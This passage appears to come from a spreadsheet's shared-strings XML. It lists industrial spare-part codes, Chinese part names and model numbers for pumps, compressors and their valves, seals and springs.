  <si>
    <t>07022478-1</t>
  </si>
  <si>
    <t>MJDYD720-60*2</t>
  </si>
  <si>
    <t>末级导叶</t>
  </si>
  <si>
    <t>07022481</t>
  </si>
  <si>
    <t>ZTD720-60*2</t>
  </si>
  <si>
    <t>07022484</t>
  </si>
  <si>
    <t>CJYL</t>
  </si>
  <si>
    <t>次级叶轮</t>
  </si>
  <si>
    <t>07022485</t>
  </si>
  <si>
    <t>初级叶轮</t>
  </si>
  <si>
    <t>07022486</t>
  </si>
  <si>
    <t>CJMFH</t>
  </si>
  <si>
    <t>初级密封环</t>
  </si>
  <si>
    <t>07022487</t>
  </si>
  <si>
    <t>次级密封环</t>
  </si>
  <si>
    <t>07022488</t>
  </si>
  <si>
    <t>DYT</t>
  </si>
  <si>
    <t>07022489</t>
  </si>
  <si>
    <t>ZTOXQ</t>
  </si>
  <si>
    <t>轴套O型圈</t>
  </si>
  <si>
    <t>07022490</t>
  </si>
  <si>
    <t>JXMFIH200-100-315</t>
  </si>
  <si>
    <t>IH200-100-315</t>
  </si>
  <si>
    <t>07022501</t>
  </si>
  <si>
    <t>FX旧尿素二甲泵</t>
  </si>
  <si>
    <t>旧尿素二甲泵</t>
  </si>
  <si>
    <t>07022502</t>
  </si>
  <si>
    <t>07022503</t>
  </si>
  <si>
    <t>THZJ2-3-01-3</t>
  </si>
  <si>
    <t>J2-3-01-3</t>
  </si>
  <si>
    <t>07022504</t>
  </si>
  <si>
    <t>DXTJ2-3-02-3AB</t>
  </si>
  <si>
    <t>J2-3-02-3AB</t>
  </si>
  <si>
    <t>07022506</t>
  </si>
  <si>
    <t>MFDJ2-3-5</t>
  </si>
  <si>
    <t>密封垫</t>
  </si>
  <si>
    <t>J2-3-5</t>
  </si>
  <si>
    <t>07022507</t>
  </si>
  <si>
    <t>MFDJ2-3-7</t>
  </si>
  <si>
    <t>J2-3-7</t>
  </si>
  <si>
    <t>07022509</t>
  </si>
  <si>
    <t>07022511</t>
  </si>
  <si>
    <t>DJ2-6-10</t>
  </si>
  <si>
    <t>J2-6-10</t>
  </si>
  <si>
    <t>07022512</t>
  </si>
  <si>
    <t>LGZW136-1-4-5</t>
  </si>
  <si>
    <t>连杆轴瓦</t>
  </si>
  <si>
    <t>136-1-4-5</t>
  </si>
  <si>
    <t>07022513</t>
  </si>
  <si>
    <t>BFQMD136-1-8</t>
  </si>
  <si>
    <t>136-1-8</t>
  </si>
  <si>
    <t>07022514</t>
  </si>
  <si>
    <t>MFDJ2-3-19</t>
  </si>
  <si>
    <t>J2-3-19</t>
  </si>
  <si>
    <t>07022515</t>
  </si>
  <si>
    <t>ZCHJ2-3-02-4</t>
  </si>
  <si>
    <t>J2-3-02-4</t>
  </si>
  <si>
    <t>07022516</t>
  </si>
  <si>
    <t>MFDJ2-3-23</t>
  </si>
  <si>
    <t>J2-3-23</t>
  </si>
  <si>
    <t>07022518</t>
  </si>
  <si>
    <t>SXTH</t>
  </si>
  <si>
    <t>蛇形弹簧</t>
  </si>
  <si>
    <t>07022519</t>
  </si>
  <si>
    <t>LC0301-04-4</t>
  </si>
  <si>
    <t>07022520</t>
  </si>
  <si>
    <t>LZQJ2-5-00</t>
  </si>
  <si>
    <t>J2-5-00</t>
  </si>
  <si>
    <t>07022521</t>
  </si>
  <si>
    <t>LT85*60</t>
  </si>
  <si>
    <t>85*60</t>
  </si>
  <si>
    <t>07022552</t>
  </si>
  <si>
    <t>DXT7J7-1-02-4</t>
  </si>
  <si>
    <t>7J7-1-02-4</t>
  </si>
  <si>
    <t>07022553</t>
  </si>
  <si>
    <t>MFQ7J7-1-02-5</t>
  </si>
  <si>
    <t>7J7-1-02-5</t>
  </si>
  <si>
    <t>07022555</t>
  </si>
  <si>
    <t>YH7J7-1-02-7</t>
  </si>
  <si>
    <t>7J7-1-02-7</t>
  </si>
  <si>
    <t>07022556</t>
  </si>
  <si>
    <t>DQJ60J1-1-01-5</t>
  </si>
  <si>
    <t>挡圈</t>
  </si>
  <si>
    <t>J60J1-1-01-5</t>
  </si>
  <si>
    <t>07022557</t>
  </si>
  <si>
    <t>DJ60J1-1-01-8</t>
  </si>
  <si>
    <t>J60J1-1-01-8</t>
  </si>
  <si>
    <t>07022558</t>
  </si>
  <si>
    <t>JYFBJ60J1-1-01-9</t>
  </si>
  <si>
    <t>进液阀板</t>
  </si>
  <si>
    <t>J60J1-1-01-9</t>
  </si>
  <si>
    <t>07022559</t>
  </si>
  <si>
    <t>JYFXJ60J1-1-01-4</t>
  </si>
  <si>
    <t>J60J1-1-01-4</t>
  </si>
  <si>
    <t>07022560</t>
  </si>
  <si>
    <t>ZHF7J7-1-01-00</t>
  </si>
  <si>
    <t>7J7-1-01-00</t>
  </si>
  <si>
    <t>07022561</t>
  </si>
  <si>
    <t>07022563</t>
  </si>
  <si>
    <t>LD7J7-1-01-1</t>
  </si>
  <si>
    <t>7J7-1-01-1</t>
  </si>
  <si>
    <t>07022604</t>
  </si>
  <si>
    <t>07022605</t>
  </si>
  <si>
    <t>07022630</t>
  </si>
  <si>
    <t>ZS液氨泵(95）</t>
  </si>
  <si>
    <t>液氨泵(95）</t>
  </si>
  <si>
    <t>07022631</t>
  </si>
  <si>
    <t>GQ115*95*6</t>
  </si>
  <si>
    <t>115*95*6</t>
  </si>
  <si>
    <t>07022635</t>
  </si>
  <si>
    <t>YHB170A1-1-01-3</t>
  </si>
  <si>
    <t>B170A1-1-01-3</t>
  </si>
  <si>
    <t>07022636</t>
  </si>
  <si>
    <t>DXT115*95*30</t>
  </si>
  <si>
    <t>115*95*30</t>
  </si>
  <si>
    <t>07022637</t>
  </si>
  <si>
    <t>MFQ115*95*10</t>
  </si>
  <si>
    <t>115*95*10</t>
  </si>
  <si>
    <t>07022641</t>
  </si>
  <si>
    <t>XFTB170A1-1-4</t>
  </si>
  <si>
    <t>B170A1-1-4</t>
  </si>
  <si>
    <t>07022642</t>
  </si>
  <si>
    <t>SFTB170A2-1-10</t>
  </si>
  <si>
    <t>B170A2-1-10</t>
  </si>
  <si>
    <t>07022645</t>
  </si>
  <si>
    <t>07022647</t>
  </si>
  <si>
    <t>STLS42*3*200</t>
  </si>
  <si>
    <t>42*3*200</t>
  </si>
  <si>
    <t>07022648</t>
  </si>
  <si>
    <t>STLSM36*3*100</t>
  </si>
  <si>
    <t>M36*3*100</t>
  </si>
  <si>
    <t>07022648-1</t>
  </si>
  <si>
    <t>STLSM24*150</t>
  </si>
  <si>
    <t>M24*150</t>
  </si>
  <si>
    <t>07022715</t>
  </si>
  <si>
    <t>LJT3JA-19/22-T</t>
  </si>
  <si>
    <t>连接体</t>
  </si>
  <si>
    <t>07022719</t>
  </si>
  <si>
    <t>LQQ</t>
  </si>
  <si>
    <t>GLC2</t>
  </si>
  <si>
    <t>07022723</t>
  </si>
  <si>
    <t>SZT大一甲泵(112*92)</t>
  </si>
  <si>
    <t>大一甲泵(112*92)</t>
  </si>
  <si>
    <t>07022724</t>
  </si>
  <si>
    <t>CTB170-7</t>
  </si>
  <si>
    <t>B170-7</t>
  </si>
  <si>
    <t>07022725</t>
  </si>
  <si>
    <t>SZTXB170-8</t>
  </si>
  <si>
    <t>B170-8</t>
  </si>
  <si>
    <t>07022726</t>
  </si>
  <si>
    <t>LGDWXB170-6</t>
  </si>
  <si>
    <t>连杆定位销</t>
  </si>
  <si>
    <t>B170-6</t>
  </si>
  <si>
    <t>07022727</t>
  </si>
  <si>
    <t>ZSB170J2-1-01-01-00</t>
  </si>
  <si>
    <t>B170J2-1-01-01-00</t>
  </si>
  <si>
    <t>07022728</t>
  </si>
  <si>
    <t>GQ112*92*6</t>
  </si>
  <si>
    <t>112*92*6</t>
  </si>
  <si>
    <t>07022729</t>
  </si>
  <si>
    <t>DHB170J2-1-01-3</t>
  </si>
  <si>
    <t>B170J2-1-01-3</t>
  </si>
  <si>
    <t>07022730</t>
  </si>
  <si>
    <t>BD112*92*10</t>
  </si>
  <si>
    <t>112*92*10</t>
  </si>
  <si>
    <t>07022731</t>
  </si>
  <si>
    <t>DXT112*92*30</t>
  </si>
  <si>
    <t>112*92*30</t>
  </si>
  <si>
    <t>07022732</t>
  </si>
  <si>
    <t>MFQ112*92</t>
  </si>
  <si>
    <t>112*92</t>
  </si>
  <si>
    <t>07022733</t>
  </si>
  <si>
    <t>LMM42*3</t>
  </si>
  <si>
    <t>M42*3</t>
  </si>
  <si>
    <t>07022733-1</t>
  </si>
  <si>
    <t>07022735</t>
  </si>
  <si>
    <t>FTHB170J1-1-02A-5</t>
  </si>
  <si>
    <t>阀弹簧</t>
  </si>
  <si>
    <t>B170J1-1-02A-5</t>
  </si>
  <si>
    <t>07022736</t>
  </si>
  <si>
    <t>DB170J2-1-13</t>
  </si>
  <si>
    <t>B170J2-1-13</t>
  </si>
  <si>
    <t>07022737</t>
  </si>
  <si>
    <t>ZJGSMB170J2</t>
  </si>
  <si>
    <t>中间杆锁母</t>
  </si>
  <si>
    <t>B170J2</t>
  </si>
  <si>
    <t>07022738</t>
  </si>
  <si>
    <t>JYFZB170J1-1-02A-6</t>
  </si>
  <si>
    <t>进液阀罩</t>
  </si>
  <si>
    <t>B170J1-1-02A-6</t>
  </si>
  <si>
    <t>07022739</t>
  </si>
  <si>
    <t>LGB170-01-00</t>
  </si>
  <si>
    <t>B170-01-00</t>
  </si>
  <si>
    <t>07022741</t>
  </si>
  <si>
    <t>FXB170J1-1-02-9</t>
  </si>
  <si>
    <t>B170J1-1-02-9</t>
  </si>
  <si>
    <t>07022744</t>
  </si>
  <si>
    <t>ZJGB170J2</t>
  </si>
  <si>
    <t>中间杆</t>
  </si>
  <si>
    <t>07022745-1</t>
  </si>
  <si>
    <t>109</t>
  </si>
  <si>
    <t>07022746</t>
  </si>
  <si>
    <t>JYFBB170J1-1-02A-4</t>
  </si>
  <si>
    <t>B170J1-1-02A-4</t>
  </si>
  <si>
    <t>07022748</t>
  </si>
  <si>
    <t>LKB170J2-9</t>
  </si>
  <si>
    <t>B170J2-9</t>
  </si>
  <si>
    <t>07022749</t>
  </si>
  <si>
    <t>B170J1-1-02-3</t>
  </si>
  <si>
    <t>B170J1-02-3</t>
  </si>
  <si>
    <t>07031313</t>
  </si>
  <si>
    <t>ZT25FB-41</t>
  </si>
  <si>
    <t>25FB-41</t>
  </si>
  <si>
    <t>07031315</t>
  </si>
  <si>
    <t>LZQ25FB-41</t>
  </si>
  <si>
    <t>07031316</t>
  </si>
  <si>
    <t>OXQ25FB-41</t>
  </si>
  <si>
    <t>07031317</t>
  </si>
  <si>
    <t>Z25FB-41</t>
  </si>
  <si>
    <t>07031318</t>
  </si>
  <si>
    <t>YL25FB-41</t>
  </si>
  <si>
    <t>07031319</t>
  </si>
  <si>
    <t>DJH25FB-41</t>
  </si>
  <si>
    <t>07031320</t>
  </si>
  <si>
    <t>3DP0-1-20-1</t>
  </si>
  <si>
    <t>07031321</t>
  </si>
  <si>
    <t>TLHT</t>
  </si>
  <si>
    <t>填料函体</t>
  </si>
  <si>
    <t>3DP0-1-20-3</t>
  </si>
  <si>
    <t>07031322-1</t>
  </si>
  <si>
    <t>45*3.1</t>
  </si>
  <si>
    <t>07031323</t>
  </si>
  <si>
    <t>TJLM</t>
  </si>
  <si>
    <t>3DPO</t>
  </si>
  <si>
    <t>07031324</t>
  </si>
  <si>
    <t>TLQ</t>
  </si>
  <si>
    <t>填料圏</t>
  </si>
  <si>
    <t>3DPO-1-20-5</t>
  </si>
  <si>
    <t>07031325</t>
  </si>
  <si>
    <t>FTH</t>
  </si>
  <si>
    <t>3DP1-2-3</t>
  </si>
  <si>
    <t>07031325-1</t>
  </si>
  <si>
    <t>ZJTH</t>
  </si>
  <si>
    <t>中间弹簧</t>
  </si>
  <si>
    <t>3DP1-2-10</t>
  </si>
  <si>
    <t>07031326</t>
  </si>
  <si>
    <t>PYFZ</t>
  </si>
  <si>
    <t>3DP1-2-6</t>
  </si>
  <si>
    <t>07031326-1</t>
  </si>
  <si>
    <t>JYFZ</t>
  </si>
  <si>
    <t>3DP1-2-12</t>
  </si>
  <si>
    <t>07031327</t>
  </si>
  <si>
    <t>3DP0-2-2</t>
  </si>
  <si>
    <t>07031328</t>
  </si>
  <si>
    <t>3DP1-2-5</t>
  </si>
  <si>
    <t>07031337</t>
  </si>
  <si>
    <t>SFZ3DP1-2-4</t>
  </si>
  <si>
    <t>上.下阀罩</t>
  </si>
  <si>
    <t>3DP1-2-4</t>
  </si>
  <si>
    <t>07032331</t>
  </si>
  <si>
    <t>FX3D1S.Z-6</t>
  </si>
  <si>
    <t>3D1S.Z-6</t>
  </si>
  <si>
    <t>07032332</t>
  </si>
  <si>
    <t>JYFZ--18</t>
  </si>
  <si>
    <t>--18</t>
  </si>
  <si>
    <t>07032333</t>
  </si>
  <si>
    <t>PYFZ--10</t>
  </si>
  <si>
    <t>--10</t>
  </si>
  <si>
    <t>07032334</t>
  </si>
  <si>
    <t>H--5</t>
  </si>
  <si>
    <t>--5</t>
  </si>
  <si>
    <t>07032335</t>
  </si>
  <si>
    <t>ZW--3/4</t>
  </si>
  <si>
    <t>--3/4</t>
  </si>
  <si>
    <t>07032336</t>
  </si>
  <si>
    <t>SZTZC3DS.1.1--3</t>
  </si>
  <si>
    <t>十字头总成</t>
  </si>
  <si>
    <t>3DS.1.1--3</t>
  </si>
  <si>
    <t>07032338</t>
  </si>
  <si>
    <t>JT--9</t>
  </si>
  <si>
    <t>--9</t>
  </si>
  <si>
    <t>07032340</t>
  </si>
  <si>
    <t>63*4.5</t>
  </si>
  <si>
    <t>07032341</t>
  </si>
  <si>
    <t>07032342</t>
  </si>
  <si>
    <t>柱塞杆</t>
  </si>
  <si>
    <t>3D1-SZ-48/1</t>
  </si>
  <si>
    <t>07032343</t>
  </si>
  <si>
    <t>THA-6</t>
  </si>
  <si>
    <t>07032344</t>
  </si>
  <si>
    <t>PYFG3D1S.Z-9</t>
  </si>
  <si>
    <t>3D1S.Z-9</t>
  </si>
  <si>
    <t>07032346</t>
  </si>
  <si>
    <t>GHTHA30-5</t>
  </si>
  <si>
    <t>THA30-5</t>
  </si>
  <si>
    <t>07032347</t>
  </si>
  <si>
    <t>ZX3D1-SZ.Z-2</t>
  </si>
  <si>
    <t>柱销</t>
  </si>
  <si>
    <t>3D1-SZ.Z-2</t>
  </si>
  <si>
    <t>07032348</t>
  </si>
  <si>
    <t>TLHTHA30-2</t>
  </si>
  <si>
    <t>THA30-2</t>
  </si>
  <si>
    <t>07032349</t>
  </si>
  <si>
    <t>07032350</t>
  </si>
  <si>
    <t>YHTHA40-4</t>
  </si>
  <si>
    <t>THA40-4</t>
  </si>
  <si>
    <t>07032352</t>
  </si>
  <si>
    <t>CL3D1-4B</t>
  </si>
  <si>
    <t>3D1-4B</t>
  </si>
  <si>
    <t>07032353</t>
  </si>
  <si>
    <t>CLZ3D1-13B</t>
  </si>
  <si>
    <t>齿轮轴</t>
  </si>
  <si>
    <t>3D1-13B</t>
  </si>
  <si>
    <t>07032354</t>
  </si>
  <si>
    <t>LGCT</t>
  </si>
  <si>
    <t>连杆衬套</t>
  </si>
  <si>
    <t>07032355</t>
  </si>
  <si>
    <t>碳环</t>
  </si>
  <si>
    <t>07032356</t>
  </si>
  <si>
    <t>ZCHTHA30-7</t>
  </si>
  <si>
    <t>THA30-7</t>
  </si>
  <si>
    <t>07032357</t>
  </si>
  <si>
    <t>H3D1-7</t>
  </si>
  <si>
    <t>3D1-7</t>
  </si>
  <si>
    <t>07032358</t>
  </si>
  <si>
    <t>JYFG3D1-16</t>
  </si>
  <si>
    <t>进液阀盖</t>
  </si>
  <si>
    <t>3D1-16</t>
  </si>
  <si>
    <t>07032359</t>
  </si>
  <si>
    <t>DTT3D1-1</t>
  </si>
  <si>
    <t>大铜套</t>
  </si>
  <si>
    <t>3D1-1</t>
  </si>
  <si>
    <t>07032362</t>
  </si>
  <si>
    <t>JTD</t>
  </si>
  <si>
    <t>接头垫</t>
  </si>
  <si>
    <t>07040455</t>
  </si>
  <si>
    <t>JXMFIH80-65-160</t>
  </si>
  <si>
    <t>IH80-65-160</t>
  </si>
  <si>
    <t>07040501</t>
  </si>
  <si>
    <t>SZTX化工空压机</t>
  </si>
  <si>
    <t>化工空压机</t>
  </si>
  <si>
    <t>07040503</t>
  </si>
  <si>
    <t>LGZJ03-00</t>
  </si>
  <si>
    <t>连杆组件</t>
  </si>
  <si>
    <t>07040505</t>
  </si>
  <si>
    <t>GYH528</t>
  </si>
  <si>
    <t>528</t>
  </si>
  <si>
    <t>07040506</t>
  </si>
  <si>
    <t>SZT04-00C</t>
  </si>
  <si>
    <t>04-00C</t>
  </si>
  <si>
    <t>07040507</t>
  </si>
  <si>
    <t>D529</t>
  </si>
  <si>
    <t>529</t>
  </si>
  <si>
    <t>07040511</t>
  </si>
  <si>
    <t>TT</t>
  </si>
  <si>
    <t>07040514</t>
  </si>
  <si>
    <t>EJQMG</t>
  </si>
  <si>
    <t>二级气门盖</t>
  </si>
  <si>
    <t>07040518</t>
  </si>
  <si>
    <t>HSH21-03C</t>
  </si>
  <si>
    <t>21-03C</t>
  </si>
  <si>
    <t>07040519</t>
  </si>
  <si>
    <t>HSH22-03C</t>
  </si>
  <si>
    <t>22-03C</t>
  </si>
  <si>
    <t>07040521</t>
  </si>
  <si>
    <t>ZCH22-04C</t>
  </si>
  <si>
    <t>22-04C</t>
  </si>
  <si>
    <t>07040522</t>
  </si>
  <si>
    <t>TH528</t>
  </si>
  <si>
    <t>07040524</t>
  </si>
  <si>
    <t>XZ31-03</t>
  </si>
  <si>
    <t>07040526</t>
  </si>
  <si>
    <t>TH31-06</t>
  </si>
  <si>
    <t>07040527</t>
  </si>
  <si>
    <t>07040528</t>
  </si>
  <si>
    <t>THP33-01</t>
  </si>
  <si>
    <t>弹簧片</t>
  </si>
  <si>
    <t>33-01</t>
  </si>
  <si>
    <t>07040534</t>
  </si>
  <si>
    <t>07040535</t>
  </si>
  <si>
    <t>HS22-01A</t>
  </si>
  <si>
    <t>22-01A</t>
  </si>
  <si>
    <t>07040539</t>
  </si>
  <si>
    <t>HS21-01A</t>
  </si>
  <si>
    <t>21-01A</t>
  </si>
  <si>
    <t>07040540</t>
  </si>
  <si>
    <t>HSG21-02B</t>
  </si>
  <si>
    <t>21-02B</t>
  </si>
  <si>
    <t>07040541</t>
  </si>
  <si>
    <t>07040544</t>
  </si>
  <si>
    <t>FZ3</t>
  </si>
  <si>
    <t>07040545</t>
  </si>
  <si>
    <t>LS69-02</t>
  </si>
  <si>
    <t>69-02</t>
  </si>
  <si>
    <t>07040546</t>
  </si>
  <si>
    <t>07040550</t>
  </si>
  <si>
    <t>FG51-01A</t>
  </si>
  <si>
    <t>51-01A</t>
  </si>
  <si>
    <t>07040551</t>
  </si>
  <si>
    <t>FG52-01A</t>
  </si>
  <si>
    <t>52-01A</t>
  </si>
  <si>
    <t>07040552</t>
  </si>
  <si>
    <t>FG42-03A</t>
  </si>
  <si>
    <t>42-03A</t>
  </si>
  <si>
    <t>07040553</t>
  </si>
  <si>
    <t>ZYQ06-05</t>
  </si>
  <si>
    <t>阻油圏</t>
  </si>
  <si>
    <t>06-05</t>
  </si>
  <si>
    <t>07040554</t>
  </si>
  <si>
    <t>LZQ69-00</t>
  </si>
  <si>
    <t>69-00</t>
  </si>
  <si>
    <t>07040560</t>
  </si>
  <si>
    <t>XZ61A-00</t>
  </si>
  <si>
    <t>61A-00</t>
  </si>
  <si>
    <t>07040562</t>
  </si>
  <si>
    <t>DS42*3*110</t>
  </si>
  <si>
    <t>42*3*110</t>
  </si>
  <si>
    <t>07040601</t>
  </si>
  <si>
    <t>07040613</t>
  </si>
  <si>
    <t>07040620</t>
  </si>
  <si>
    <t>07041051</t>
  </si>
  <si>
    <t>ZTIH80-65-160A</t>
  </si>
  <si>
    <t>IH80-65-160A</t>
  </si>
  <si>
    <t>07041055</t>
  </si>
  <si>
    <t>YLIH80-65-160A</t>
  </si>
  <si>
    <t>07041203</t>
  </si>
  <si>
    <t>ZS3DP0-1-24-1</t>
  </si>
  <si>
    <t>3DP0-1-24-1</t>
  </si>
  <si>
    <t>07041204</t>
  </si>
  <si>
    <t>LG3DP0-1-7</t>
  </si>
  <si>
    <t>3DP0-1-7</t>
  </si>
  <si>
    <t>07041205</t>
  </si>
  <si>
    <t>CT3DP0-1-9</t>
  </si>
  <si>
    <t>3DP0-1-9</t>
  </si>
  <si>
    <t>07041206</t>
  </si>
  <si>
    <t>TLHT3DP0-1-20-3</t>
  </si>
  <si>
    <t>07041207</t>
  </si>
  <si>
    <t>3DP0-1-18</t>
  </si>
  <si>
    <t>07041213</t>
  </si>
  <si>
    <t>SZT</t>
  </si>
  <si>
    <t>3DPO-1-10</t>
  </si>
  <si>
    <t>07041214</t>
  </si>
  <si>
    <t>SZTX</t>
  </si>
  <si>
    <t>3DPO-1-9</t>
  </si>
  <si>
    <t>07041216</t>
  </si>
  <si>
    <t>3DPO-4</t>
  </si>
  <si>
    <t>07041216-1</t>
  </si>
  <si>
    <t>07042317</t>
  </si>
  <si>
    <t>YL250S-39</t>
  </si>
  <si>
    <t>07042318</t>
  </si>
  <si>
    <t>BZ250S-39</t>
  </si>
  <si>
    <t>07042319</t>
  </si>
  <si>
    <t>ZT250S-39</t>
  </si>
  <si>
    <t>07042320</t>
  </si>
  <si>
    <t>KH250S-39</t>
  </si>
  <si>
    <t>07042321</t>
  </si>
  <si>
    <t>YLM250S-39</t>
  </si>
  <si>
    <t>07042324</t>
  </si>
  <si>
    <t>YG250S-39</t>
  </si>
  <si>
    <t>07042361</t>
  </si>
  <si>
    <t>BZIH80-50-250</t>
  </si>
  <si>
    <t>07042362</t>
  </si>
  <si>
    <t>ZTIH80-50-250</t>
  </si>
  <si>
    <t>07042363</t>
  </si>
  <si>
    <t>ZCSIH80-50-250</t>
  </si>
  <si>
    <t>轴承箱</t>
  </si>
  <si>
    <t>07042364</t>
  </si>
  <si>
    <t>LZQIH80-50-250</t>
  </si>
  <si>
    <t>07042365</t>
  </si>
  <si>
    <t>YLIH80-50-250</t>
  </si>
  <si>
    <t>07042366</t>
  </si>
  <si>
    <t>LMIH80-50-250</t>
  </si>
  <si>
    <t>07042370</t>
  </si>
  <si>
    <t>JXMFKQW65/250-15/2</t>
  </si>
  <si>
    <t>07042371</t>
  </si>
  <si>
    <t>YLKQW65/250-15/2</t>
  </si>
  <si>
    <t>07042372</t>
  </si>
  <si>
    <t>SMKQW65/250-15/2</t>
  </si>
  <si>
    <t>07042383</t>
  </si>
  <si>
    <t>07050402</t>
  </si>
  <si>
    <t>GYFJT</t>
  </si>
  <si>
    <t>高压阀接头</t>
  </si>
  <si>
    <t>07050405</t>
  </si>
  <si>
    <t>GYH0507</t>
  </si>
  <si>
    <t>0507</t>
  </si>
  <si>
    <t>07050406</t>
  </si>
  <si>
    <t>DYF0800</t>
  </si>
  <si>
    <t>低压阀</t>
  </si>
  <si>
    <t>0800</t>
  </si>
  <si>
    <t>07050407</t>
  </si>
  <si>
    <t>GYF0900</t>
  </si>
  <si>
    <t>高压阀</t>
  </si>
  <si>
    <t>0900</t>
  </si>
  <si>
    <t>07050408</t>
  </si>
  <si>
    <t>TH0904</t>
  </si>
  <si>
    <t>0904</t>
  </si>
  <si>
    <t>07050409</t>
  </si>
  <si>
    <t>G07-00</t>
  </si>
  <si>
    <t>盖</t>
  </si>
  <si>
    <t>07-00</t>
  </si>
  <si>
    <t>07050410</t>
  </si>
  <si>
    <t>FP0805</t>
  </si>
  <si>
    <t>0805</t>
  </si>
  <si>
    <t>07050411</t>
  </si>
  <si>
    <t>QGGLQSJT</t>
  </si>
  <si>
    <t>气缸盖冷却水接头</t>
  </si>
  <si>
    <t>07050413</t>
  </si>
  <si>
    <t>D0410</t>
  </si>
  <si>
    <t>0410</t>
  </si>
  <si>
    <t>07050415</t>
  </si>
  <si>
    <t>D0412</t>
  </si>
  <si>
    <t>0412</t>
  </si>
  <si>
    <t>07050416</t>
  </si>
  <si>
    <t>LGLD0405</t>
  </si>
  <si>
    <t>连杆螺钉</t>
  </si>
  <si>
    <t>0405</t>
  </si>
  <si>
    <t>07050417</t>
  </si>
  <si>
    <t>DYH0205</t>
  </si>
  <si>
    <t>挡油环</t>
  </si>
  <si>
    <t>0205</t>
  </si>
  <si>
    <t>07050418</t>
  </si>
  <si>
    <t>LD0508</t>
  </si>
  <si>
    <t>0508</t>
  </si>
  <si>
    <t>07050419</t>
  </si>
  <si>
    <t>GYAQF1400</t>
  </si>
  <si>
    <t>高压安全阀</t>
  </si>
  <si>
    <t>1400</t>
  </si>
  <si>
    <t>07050420</t>
  </si>
  <si>
    <t>GYLQQ1100</t>
  </si>
  <si>
    <t>高压冷却器</t>
  </si>
  <si>
    <t>1100</t>
  </si>
  <si>
    <t>07050421</t>
  </si>
  <si>
    <t>DYLQQ1000</t>
  </si>
  <si>
    <t>低压冷却器</t>
  </si>
  <si>
    <t>07050422</t>
  </si>
  <si>
    <t>QZ0301</t>
  </si>
  <si>
    <t>0301</t>
  </si>
  <si>
    <t>07050423</t>
  </si>
  <si>
    <t>QG0601</t>
  </si>
  <si>
    <t>气缸</t>
  </si>
  <si>
    <t>0601</t>
  </si>
  <si>
    <t>07050425--1</t>
  </si>
  <si>
    <t>YT0001</t>
  </si>
  <si>
    <t>压套</t>
  </si>
  <si>
    <t>0001</t>
  </si>
  <si>
    <t>07050426</t>
  </si>
  <si>
    <t>GLJT</t>
  </si>
  <si>
    <t>管路接头</t>
  </si>
  <si>
    <t>07050427</t>
  </si>
  <si>
    <t>HYH0408</t>
  </si>
  <si>
    <t>滑油环</t>
  </si>
  <si>
    <t>0408</t>
  </si>
  <si>
    <t>07050428</t>
  </si>
  <si>
    <t>ZYZC0202</t>
  </si>
  <si>
    <t>左右轴承</t>
  </si>
  <si>
    <t>0202</t>
  </si>
  <si>
    <t>07050429</t>
  </si>
  <si>
    <t>QGT0102</t>
  </si>
  <si>
    <t>气缸套</t>
  </si>
  <si>
    <t>0102</t>
  </si>
  <si>
    <t>07050431</t>
  </si>
  <si>
    <t>连杆轴承</t>
  </si>
  <si>
    <t>07050432</t>
  </si>
  <si>
    <t>QGGWP60</t>
  </si>
  <si>
    <t>汽缸盖</t>
  </si>
  <si>
    <t>07050433</t>
  </si>
  <si>
    <t>LGWP60</t>
  </si>
  <si>
    <t>07050434</t>
  </si>
  <si>
    <t>LW</t>
  </si>
  <si>
    <t>滤网</t>
  </si>
  <si>
    <t>07050435</t>
  </si>
  <si>
    <t>QDYP空压机WP60</t>
  </si>
  <si>
    <t>驱动圆盘</t>
  </si>
  <si>
    <t>空压机WP60</t>
  </si>
  <si>
    <t>07050436</t>
  </si>
  <si>
    <t>LZQBJ</t>
  </si>
  <si>
    <t>联轴器部件</t>
  </si>
  <si>
    <t>07050438</t>
  </si>
  <si>
    <t>KQGLBJ</t>
  </si>
  <si>
    <t>空气管路部件</t>
  </si>
  <si>
    <t>07050439</t>
  </si>
  <si>
    <t>HSH</t>
  </si>
  <si>
    <t>07050439-1</t>
  </si>
  <si>
    <t>BXH</t>
  </si>
  <si>
    <t>鼻型环</t>
  </si>
  <si>
    <t>07050439-2</t>
  </si>
  <si>
    <t>GYH</t>
  </si>
  <si>
    <t>07050440</t>
  </si>
  <si>
    <t>MFQWP60--1</t>
  </si>
  <si>
    <t>WP60--1</t>
  </si>
  <si>
    <t>07050441</t>
  </si>
  <si>
    <t>YJZHF</t>
  </si>
  <si>
    <t>一级组合阀</t>
  </si>
  <si>
    <t>07050442</t>
  </si>
  <si>
    <t>HSBJ</t>
  </si>
  <si>
    <t>活塞部件</t>
  </si>
  <si>
    <t>07050443</t>
  </si>
  <si>
    <t>EJZHFWP60</t>
  </si>
  <si>
    <t>二级组合阀</t>
  </si>
  <si>
    <t>07050444</t>
  </si>
  <si>
    <t>XJKWP60</t>
  </si>
  <si>
    <t>橡胶块</t>
  </si>
  <si>
    <t>07050448</t>
  </si>
  <si>
    <t>MFQWP60</t>
  </si>
  <si>
    <t>07050449</t>
  </si>
  <si>
    <t>MFD</t>
  </si>
  <si>
    <t>07050451</t>
  </si>
  <si>
    <t>ZYB</t>
  </si>
  <si>
    <t>主油泵</t>
  </si>
  <si>
    <t>07050452</t>
  </si>
  <si>
    <t>FHP</t>
  </si>
  <si>
    <t>防护片</t>
  </si>
  <si>
    <t>07050454</t>
  </si>
  <si>
    <t>DXTH</t>
  </si>
  <si>
    <t>碟形弹簧</t>
  </si>
  <si>
    <t>07050455</t>
  </si>
  <si>
    <t>QG</t>
  </si>
  <si>
    <t>07050456</t>
  </si>
  <si>
    <t>LQQGBJ</t>
  </si>
  <si>
    <t>冷却器管部件</t>
  </si>
  <si>
    <t>07050457</t>
  </si>
  <si>
    <t>HZFP</t>
  </si>
  <si>
    <t>环状阀片</t>
  </si>
  <si>
    <t>07050457-1</t>
  </si>
  <si>
    <t>WZFP</t>
  </si>
  <si>
    <t>网状阀片</t>
  </si>
  <si>
    <t>07050458</t>
  </si>
  <si>
    <t>环状弹簧片</t>
  </si>
  <si>
    <t>07050458-1</t>
  </si>
  <si>
    <t>网状弹簧片</t>
  </si>
  <si>
    <t>07050461</t>
  </si>
  <si>
    <t>07050462</t>
  </si>
  <si>
    <t>KQG</t>
  </si>
  <si>
    <t>07050475</t>
  </si>
  <si>
    <t>TLLW--6/15</t>
  </si>
  <si>
    <t>LW--6/15</t>
  </si>
  <si>
    <t>07050476</t>
  </si>
  <si>
    <t>GYHLW--6/15</t>
  </si>
  <si>
    <t>07050477</t>
  </si>
  <si>
    <t>HSG</t>
  </si>
  <si>
    <t>07050480</t>
  </si>
  <si>
    <t>YJDXH2103</t>
  </si>
  <si>
    <t>一级导向环</t>
  </si>
